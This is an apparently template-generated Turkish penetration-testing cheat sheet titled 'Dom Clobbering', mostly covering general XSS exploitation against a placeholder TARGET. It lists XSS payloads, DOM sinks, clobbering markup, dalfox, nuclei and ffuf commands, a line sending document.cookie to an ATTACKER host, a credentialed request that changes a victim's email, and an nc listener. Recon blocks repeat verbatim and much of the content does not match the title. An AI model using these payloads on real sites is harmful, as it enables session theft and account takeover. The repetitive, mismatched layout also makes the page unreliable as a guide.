Skip to content

Dom Clobbering

web xss

Dom Clobbering bağlamında saldırgan kontrollü script’in güvenilen origin’de çalışması hedeflenir. Reflected/stored/DOM yolları ve oturum sömürüsü odaklıdır.

  1. Yansıma bağlamını (HTML/attr/JS/URL) işaretçi ile bul.

  2. Bağlama uygun payload ve encode katmanını kır.

  3. CSP/WAF varsa gadget veya bypass dene.

  4. Oturum çalma veya işlem PoC’si üret.

pt7x9MARKER
Terminal window
curl -sk 'https://TARGET/search?q=pt7x9MARKER' | rg -n 'pt7x9MARKER'
<svg/onload=alert(document.domain)>
"><img src=x onerror=alert(1)>
';alert(document.domain)//
Terminal window
dalfox url 'https://TARGET/search?q=FUZZ' -b https://ATTACKER/
location.hash.slice(1)
document.write(location.search)
el.innerHTML = new URLSearchParams(location.search).get('q')
Terminal window
nuclei -u https://TARGET -t exposures/ -tags xss
<form id=x><input id=y name=z value=evil></form>
<a id=defaultView>
<img name=getElementById>
// document.x.y değeri saldırgan kontrollü
fetch('https://ATTACKER/c?'+document.cookie)
fetch('/api/change-email',{method:'POST',credentials:'include',headers:{'Content-Type':'application/json'},body:JSON.stringify({email:'evil@x.com'})})
Terminal window
nc -lvnp 8000

Dom Clobbering sonuçları hedef sürüme ve yığına göre değişir. Her başarılı adımı request/response ile kaydet; sonraki pivot’u not et.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
nuclei -u https://TARGET -as -silent
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt

Bu ekler keşif ve kanıt paketini hızlandırır; asıl sömürü üstteki bölümlerdeki konu-özel payload’larla yapılır.

Terminal window
curl -sk https://TARGET/robots.txt
Terminal window
curl -sk https://TARGET/sitemap.xml
Terminal window
ffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403
Terminal window
nuclei -u https://TARGET -as -silent
GET / HTTP/1.1
Host: TARGET
Accept: */*
Terminal window
mkdir -p evidence/web && tee evidence/web/notes.txt
request/response
zaman damgası
kullanılan hesap
etki özeti
Terminal window
curl -sk https://TARGET/ -D evidence/web/headers.txt -o evidence/web/body.html